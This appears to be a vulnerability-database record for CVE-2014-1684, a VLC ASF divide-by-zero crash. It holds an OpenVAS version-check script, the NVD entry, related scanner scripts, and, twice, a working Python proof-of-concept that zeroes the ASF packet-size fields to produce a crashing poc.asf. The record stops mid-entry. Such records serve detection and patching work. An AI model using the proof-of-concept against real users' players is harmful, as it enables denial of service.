VLC Media Player ASF Demuxer Denial of Service Vulnerability (Mac OS X)
2014-03-06T00:00:00
ID OPENVAS:1361412562310804324 Type openvas Reporter Copyright (C) 2014 Greenbone Networks GmbH Modified 2020-04-20T00:00:00
Description
This host is installed with VLC Media Player and is prone to denial of
service vulnerability.
###############################################################################
# OpenVAS Vulnerability Test
#
# VLC Media Player ASF Demuxer Denial of Service Vulnerability (Mac OS X)
#
# Authors:
# Shakeel <bshakeel@secpod.com>
#
# Copyright:
# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
CPE = "cpe:/a:videolan:vlc_media_player";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.804324");
script_version("2020-04-20T13:31:49+0000");
script_cve_id("CVE-2014-1684");
script_bugtraq_id(65399);
script_tag(name:"cvss_base", value:"4.3");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:N/A:P");
script_tag(name:"last_modification", value:"2020-04-20 13:31:49 +0000 (Mon, 20 Apr 2020)");
script_tag(name:"creation_date", value:"2014-03-06 01:02:27 +0530 (Thu, 06 Mar 2014)");
script_name("VLC Media Player ASF Demuxer Denial of Service Vulnerability (Mac OS X)");
script_tag(name:"summary", value:"This host is installed with VLC Media Player and is prone to denial of
service vulnerability.");
script_tag(name:"vuldetect", value:"Checks if a vulnerable version is present on the target host.");
script_tag(name:"insight", value:"The flaw exists due to a divide-by-zero error when processing malicious
'.asf' files.");
script_tag(name:"impact", value:"Successful exploitation will allow attackers to cause a denial of service
condition.");
script_tag(name:"affected", value:"VLC media player version 2.1.2 and prior on Mac OS X.");
script_tag(name:"solution", value:"Upgrade to VLC media player version 2.1.3 or later.");
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
script_xref(name:"URL", value:"http://xforce.iss.net/xforce/xfdb/90955");
script_xref(name:"URL", value:"http://www.exploit-db.com/exploits/31429");
script_xref(name:"URL", value:"http://www.videolan.org/developers/vlc-branch/NEWS");
script_xref(name:"URL", value:"http://packetstormsecurity.com/files/125080/VLC-Media-Player-2.1.2-Denial-Of-Service.html");
script_copyright("Copyright (C) 2014 Greenbone Networks GmbH");
script_category(ACT_GATHER_INFO);
script_family("Denial of Service");
script_dependencies("gb_vlc_media_player_detect_macosx.nasl");
script_mandatory_keys("VLC/Media/Player/MacOSX/Version");
script_xref(name:"URL", value:"http://www.videolan.org/vlc");
exit(0);
}
include("version_func.inc");
include("host_details.inc");
vlcVer = get_app_version(cpe:CPE);
if(!vlcVer){
exit(0);
}
if(version_is_less_equal(version:vlcVer, test_version:"2.1.2"))
{
report = report_fixed_ver(installed_version:vlcVer, vulnerable_range:"Less than or equal to 2.1.2");
security_message(port:0, data:report);
exit(0);
}
{"id": "OPENVAS:1361412562310804324", "type": "openvas", "bulletinFamily": "scanner", "title": "VLC Media Player ASF Demuxer Denial of Service Vulnerability (Mac OS X)", "description": "This host is installed with VLC Media Player and is prone to denial of\nservice vulnerability.", "published": "2014-03-06T00:00:00", "modified": "2020-04-20T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804324", "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "references": ["http://www.exploit-db.com/exploits/31429", "http://www.videolan.org/developers/vlc-branch/NEWS", "http://www.videolan.org/vlc", "http://xforce.iss.net/xforce/xfdb/90955", "http://packetstormsecurity.com/files/125080/VLC-Media-Player-2.1.2-Denial-Of-Service.html"], "cvelist": ["CVE-2014-1684"], "lastseen": "2020-04-22T17:03:05", "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-1684"]}, {"type": "zdt", "idList": ["1337DAY-ID-21864"]}, {"type": "nessus", "idList": ["VLC_2_1_3.NASL", "GENTOO_GLSA-201603-08.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310804323", "OPENVAS:1361412562310804325", "OPENVAS:1361412562310121450"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:125080"]}, {"type": "exploitdb", "idList": ["EDB-ID:31429"]}, {"type": "gentoo", "idList": ["GLSA-201603-08"]}], "modified": "2020-04-22T17:03:05", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2020-04-22T17:03:05", "rev": 2}, "vulnersScore": 6.4}, "pluginID": "1361412562310804324", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VLC Media Player ASF Demuxer Denial of Service Vulnerability (Mac OS X)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:videolan:vlc_media_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804324\");\n script_version(\"2020-04-20T13:31:49+0000\");\n script_cve_id(\"CVE-2014-1684\");\n script_bugtraq_id(65399);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-20 13:31:49 +0000 (Mon, 20 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-03-06 01:02:27 +0530 (Thu, 06 Mar 2014)\");\n script_name(\"VLC Media Player ASF Demuxer Denial of Service Vulnerability (Mac OS X)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with VLC Media Player and is prone to denial of\nservice vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The flaw exists due to a divide-by-zero error when processing malicious\n'.asf' files.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to cause a denial of service\ncondition.\");\n script_tag(name:\"affected\", value:\"VLC media player version 2.1.2 and prior on Mac OS X.\");\n script_tag(name:\"solution\", value:\"Upgrade to VLC media player version 2.1.3 or later.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/90955\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/31429\");\n script_xref(name:\"URL\", value:\"http://www.videolan.org/developers/vlc-branch/NEWS\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/125080/VLC-Media-Player-2.1.2-Denial-Of-Service.html\");\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_vlc_media_player_detect_macosx.nasl\");\n script_mandatory_keys(\"VLC/Media/Player/MacOSX/Version\");\n script_xref(name:\"URL\", value:\"http://www.videolan.org/vlc\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nvlcVer = get_app_version(cpe:CPE);\nif(!vlcVer){\n exit(0);\n}\n\nif(version_is_less_equal(version:vlcVer, test_version:\"2.1.2\"))\n{\n report = report_fixed_ver(installed_version:vlcVer, vulnerable_range:\"Less than or equal to 2.1.2\");\n security_message(port:0, data:report);\n exit(0);\n}\n", "naslFamily": "Denial of Service"}
{"cve": [{"lastseen": "2020-12-09T19:58:21", "description": "The ASF_ReadObject_file_properties function in modules/demux/asf/libasf.c in the ASF Demuxer in VideoLAN VLC Media Player before 2.1.3 allows remote attackers to cause a denial of service (divide-by-zero error and crash) via a zero minimum and maximum data packet size in an ASF file.", "edition": 5, "cvss3": {}, "published": "2014-03-03T16:55:00", "title": "CVE-2014-1684", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1684"], "modified": "2017-07-01T01:29:00", "cpe": ["cpe:/a:videolan:vlc_media_player:2.0.5", "cpe:/a:videolan:vlc_media_player:2.1.2", "cpe:/a:videolan:vlc_media_player:1.0.5", "cpe:/a:videolan:vlc_media_player:1.0.4", "cpe:/a:videolan:vlc_media_player:1.1.10", "cpe:/a:videolan:vlc_media_player:1.1.3", "cpe:/a:videolan:vlc_media_player:1.1.4.1", "cpe:/a:videolan:vlc_media_player:1.0.3", "cpe:/a:videolan:vlc_media_player:1.1.10.1", "cpe:/a:videolan:vlc_media_player:2.1.1", "cpe:/a:videolan:vlc_media_player:2.1.0", "cpe:/a:videolan:vlc_media_player:1.0.0", "cpe:/a:videolan:vlc_media_player:2.0.9", "cpe:/a:videolan:vlc_media_player:2.0.8", "cpe:/a:videolan:vlc_media_player:1.1.1", "cpe:/a:videolan:vlc_media_player:2.0.3", "cpe:/a:videolan:vlc_media_player:1.1.4", "cpe:/a:videolan:vlc_media_player:2.0.1", "cpe:/a:videolan:vlc_media_player:2.0.2", "cpe:/a:videolan:vlc_media_player:1.1.6", "cpe:/a:videolan:vlc_media_player:1.1.12", "cpe:/a:videolan:vlc_media_player:1.1.13", "cpe:/a:videolan:vlc_media_player:1.0.2", "cpe:/a:videolan:vlc_media_player:1.0.1", "cpe:/a:videolan:vlc_media_player:1.1.6.1", "cpe:/a:videolan:vlc_media_player:1.1.8", "cpe:/a:videolan:vlc_media_player:1.1.0", "cpe:/a:videolan:vlc_media_player:1.1.7", "cpe:/a:videolan:vlc_media_player:2.0.4", "cpe:/a:videolan:vlc_media_player:2.0.7", "cpe:/a:videolan:vlc_media_player:2.0.0", "cpe:/a:videolan:vlc_media_player:1.1.9", "cpe:/a:videolan:vlc_media_player:1.1.5", "cpe:/a:videolan:vlc_media_player:1.1.11", "cpe:/a:videolan:vlc_media_player:2.0.6", "cpe:/a:videolan:vlc_media_player:1.1.2", "cpe:/a:videolan:vlc_media_player:1.0.6"], "id": "CVE-2014-1684", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1684", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:videolan:vlc_media_player:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.1.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.1.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.1.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:videolan:vlc_media_player:2.0.6:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-01-24T19:11:50", "description": "Exploit for multiple platform in category dos / poc", "edition": 2, "published": "2014-02-05T00:00:00", "type": "zdt", "title": "VLC 2.1.2 (.asf) - Crash PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1684"], "modified": "2014-02-05T00:00:00", "id": "1337DAY-ID-21864", "href": "https://0day.today/exploit/description/21864", "sourceData": "#!/usr/bin/python\r\n# VLC Media Player up to 2.1.2 DOS POC Integer Division By zero in ASF Demuxer\r\n# VLC Media Player is prone to DOS utilizing a division by zero error if minimium data packet size\r\n# is equal to zero. this was tested on windows XP sp3 and affects all versions of vlc till latest 2.1.2\r\n# to run this script you need to install python bitstring module\r\n# usage you supply any valid asf and the script will produxe a POC asf that will crash vlc\r\n \r\nimport sys\r\nfrom bitstring import BitArray\r\n \r\nf = open(sys.argv[1],'r+b')\r\n \r\nf.seek(0,2)\r\n \r\nsize = f.tell()\r\n \r\nprint \"[*] file size: %d\" % size\r\n \r\nf.seek(0,0)\r\n \r\nprint \"[*] ReeeeeWWWWWWiiiiiNNNNNNND\"\r\n \r\nfb = BitArray(f)\r\n \r\nindex = fb.find('0xa1dcab8c47a9cf118ee400c00c205365',bytealigned=True)\r\n \r\nprint \"[*] found file properties GUID\"\r\nprint \"[*] File properties GUID: %s\" % fb[index[0]:(index[0]+128)]\r\n \r\n# index of minumum packet size in File Proprties header\r\ni_min_data_pkt_size = index[0] + 736\r\n \r\nprint \"[*] Original Minimum Data Packet Size: %s\" % fb[i_min_data_pkt_size:i_min_data_pkt_size+32].hex\r\nprint \"[*] Original Maximum Data Packet Size: %s\" % fb[i_min_data_pkt_size+32:i_min_data_pkt_size+64].hex\r\n \r\n# Accroding to ASF standarad the minimum data size and the maximum data size should be equal\r\nprint \"[*] Changing Miniumum and Maximum Data packet size to 0\"\r\n \r\n# changing the data packets in bit array\r\n \r\nfb[i_min_data_pkt_size:i_min_data_pkt_size+8] = 0x00\r\nfb[i_min_data_pkt_size+8:i_min_data_pkt_size+16] = 0x00\r\nfb[i_min_data_pkt_size+16:i_min_data_pkt_size+24] = 0x00\r\nfb[i_min_data_pkt_size+24:i_min_data_pkt_size+32] = 0x00\r\nfb[i_min_data_pkt_size+32:i_min_data_pkt_size+40] = 0x00\r\nfb[i_min_data_pkt_size+40:i_min_data_pkt_size+48] = 0x00\r\nfb[i_min_data_pkt_size+48:i_min_data_pkt_size+56] = 0x00\r\nfb[i_min_data_pkt_size+56:i_min_data_pkt_size+64] = 0x00\r\n \r\nprint \"[*] POC File Created poc.asf\"\r\n \r\nof = open('poc.asf','w+b')\r\nfb.tofile(of)\r\nof.close()\r\nf.close()\n\n# 0day.today [2018-01-24] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/21864"}], "packetstorm": [{"lastseen": "2016-12-05T22:14:32", "description": "", "published": "2014-02-06T00:00:00", "type": "packetstorm", "title": "VLC Media Player 2.1.2 Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1684"], "modified": "2014-02-06T00:00:00", "id": "PACKETSTORM:125080", "href": "https://packetstormsecurity.com/files/125080/VLC-Media-Player-2.1.2-Denial-Of-Service.html", "sourceData": "`#!/usr/bin/python \n# VLC Media Player up to 2.1.2 DOS POC Integer Division By zero in ASF Demuxer \n# VLC Media Player is prone to DOS utilizing a division by zero error if minimium data packet size \n# is equal to zero. this was tested on windows XP sp3 and affects all versions of vlc till latest 2.1.2 \n# to run this script you need to install python bitstring module \n# usage you supply any valid asf and the script will produxe a POC asf that will crash vlc \n \nimport sys \nfrom bitstring import BitArray \n \nf = open(sys.argv[1],'r+b') \n \nf.seek(0,2) \n \nsize = f.tell() \n \nprint \"[*] file size: %d\" % size \n \nf.seek(0,0) \n \nprint \"[*] ReeeeeWWWWWWiiiiiNNNNNNND\" \n \nfb = BitArray(f) \n \nindex = fb.find('0xa1dcab8c47a9cf118ee400c00c205365',bytealigned=True) \n \nprint \"[*] found file properties GUID\" \nprint \"[*] File properties GUID: %s\" % fb[index[0]:(index[0]+128)] \n \n# index of minumum packet size in File Proprties header \ni_min_data_pkt_size = index[0] + 736 \n \nprint \"[*] Original Minimum Data Packet Size: %s\" % fb[i_min_data_pkt_size:i_min_data_pkt_size+32].hex \nprint \"[*] Original Maximum Data Packet Size: %s\" % fb[i_min_data_pkt_size+32:i_min_data_pkt_size+64].hex \n \n# Accroding to ASF standarad the minimum data size and the maximum data size should be equal \nprint \"[*] Changing Miniumum and Maximum Data packet size to 0\" \n \n# changing the data packets in bit array \n \nfb[i_min_data_pkt_size:i_min_data_pkt_size+8] = 0x00 \nfb[i_min_data_pkt_size+8:i_min_data_pkt_size+16] = 0x00 \nfb[i_min_data_pkt_size+16:i_min_data_pkt_size+24] = 0x00 \nfb[i_min_data_pkt_size+24:i_min_data_pkt_size+32] = 0x00 \nfb[i_min_data_pkt_size+32:i_min_data_pkt_size+40] = 0x00 \nfb[i_min_data_pkt_size+40:i_min_data_pkt_size+48] = 0x00 \nfb[i_min_data_pkt_size+48:i_min_data_pkt_size+56] = 0x00 \nfb[i_min_data_pkt_size+56:i_min_data_pkt_size+64] = 0x00 \n \nprint \"[*] POC File Created poc.asf\" \n \nof = open('poc.asf','w+b') \nfb.tofile(of) \nof.close() \nf.close() \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/125080/asf-poc.py.txt"}], "openvas": [{"lastseen": "2020-04-22T17:03:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1684"], "description": "This host is installed with VLC Media Player and is prone to denial of\nservice vulnerability.", "modified": "2020-04-20T00:00:00", "published": "2014-03-06T00:00:00", "id": "OPENVAS:1361412562310804323", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804323", "type": "openvas", "title": "VLC Media Player ASF Demuxer Denial of Service Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VLC Media Player ASF Demuxer Denial of Service Vulnerability (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:videolan:vlc_media_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804323\");\n script_version(\"2020-04-20T13:31:49+0000\");\n script_cve_id(\"CVE-2014-1684\");\n script_bugtraq_id(65399);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-20 13:31:49 +0000 (Mon, 20 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-03-06 12:15:27 +0530 (Thu, 06 Mar 2014)\");\n script_name(\"VLC Media Player ASF Demuxer Denial of Service Vulnerability (Windows)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with VLC Media Player and is prone to denial of\nservice vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The flaw exists due to a divide-by-zero error when processing malicious\n'.asf' files.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to cause a denial of service\ncondition.\");\n script_tag(name:\"affected\", value:\"VLC media player version 2.1.2 and prior on Windows.\");\n script_tag(name:\"solution\", value:\"Upgrade to VLC media player version 2.1.3 or later.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/90955\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/31429\");\n script_xref(name:\"URL\", value:\"http://www.videolan.org/developers/vlc-branch/NEWS\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/125080/VLC-Media-Player-2.1.2-Denial-Of-Service.html\");\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Denial of Service\");\n script_dependencies(\"secpod_vlc_media_player_detect_win.nasl\");\n script_mandatory_keys(\"VLCPlayer/Win/Installed\");\n script_xref(name:\"URL\", value:\"http://www.videolan.org/vlc\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nvlcVer = get_app_version(cpe:CPE);\nif(!vlcVer){\n exit(0);\n}\n\nif(version_is_less_equal(version:vlcVer, test_version:\"2.1.2\"))\n{\n report = report_fixed_ver(installed_version:vlcVer, vulnerable_range:\"Less than or equal to 2.1.2\");\n security_message(port:0, data:report);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-22T17:03:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1684"], "description": "This host is installed with VLC Media Player and is prone to denial of\nservice vulnerability.", "modified": "2020-04-20T00:00:00", "published": "2014-03-06T00:00:00", "id": "OPENVAS:1361412562310804325", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804325", "type": "openvas", "title": "VLC Media Player ASF Demuxer Denial of Service Vulnerability (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VLC Media Player ASF Demuxer Denial of Service Vulnerability (Linux)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:videolan:vlc_media_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804325\");\n script_version(\"2020-04-20T13:31:49+0000\");\n script_cve_id(\"CVE-2014-1684\");\n script_bugtraq_id(65399);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-20 13:31:49 +0000 (Mon, 20 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-03-06 01:30:27 +0530 (Thu, 06 Mar 2014)\");\n script_name(\"VLC Media Player ASF Demuxer Denial of Service Vulnerability (Linux)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with VLC Media Player and is prone to denial of\nservice vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The flaw exists due to a divide-by-zero error when processing malicious\n'.asf' files.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to cause a denial of service\ncondition.\");\n script_tag(name:\"affected\", value:\"VLC media player version 2.1.2 and prior on Linux.\");\n script_tag(name:\"solution\", value:\"Upgrade to VLC media player version 2.1.3 or later.\");\n script_tag(name:\"qod_type\", value:\"executable_version_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/90955\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/31429\");\n script_xref(name:\"URL\", value:\"http://www.videolan.org/developers/vlc-branch/NEWS\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/125080/VLC-Media-Player-2.1.2-Denial-Of-Service.html\");\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Denial of Service\");\n script_dependencies(\"secpod_vlc_media_player_detect_lin.nasl\");\n script_mandatory_keys(\"VLCPlayer/Lin/Ver\");\n script_xref(name:\"URL\", value:\"http://www.videolan.org/vlc\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nvlcVer = get_app_version(cpe:CPE);\nif(!vlcVer){\n exit(0);\n}\n\nif(version_is_less_equal(version:vlcVer, test_version:\"2.1.2\"))\n{\n report = report_fixed_ver(installed_version:vlcVer, vulnerable_range:\"Less than or equal to 2.1.2\");\n security_message(port:0, data:report);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:35:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9629", "CVE-2015-1202", "CVE-2014-9627", "CVE-2014-6440", "CVE-2014-9625", "CVE-2015-1203", "CVE-2014-9628", "CVE-2015-5949", "CVE-2014-9626", "CVE-2014-1684", "CVE-2014-9598", "CVE-2014-9597", "CVE-2014-9630"], "description": "Gentoo Linux Local Security Checks GLSA 201603-08", "modified": "2018-10-26T00:00:00", "published": "2016-03-14T00:00:00", "id": "OPENVAS:1361412562310121450", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121450", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201603-08", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201603-08.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.fi>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121450\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", 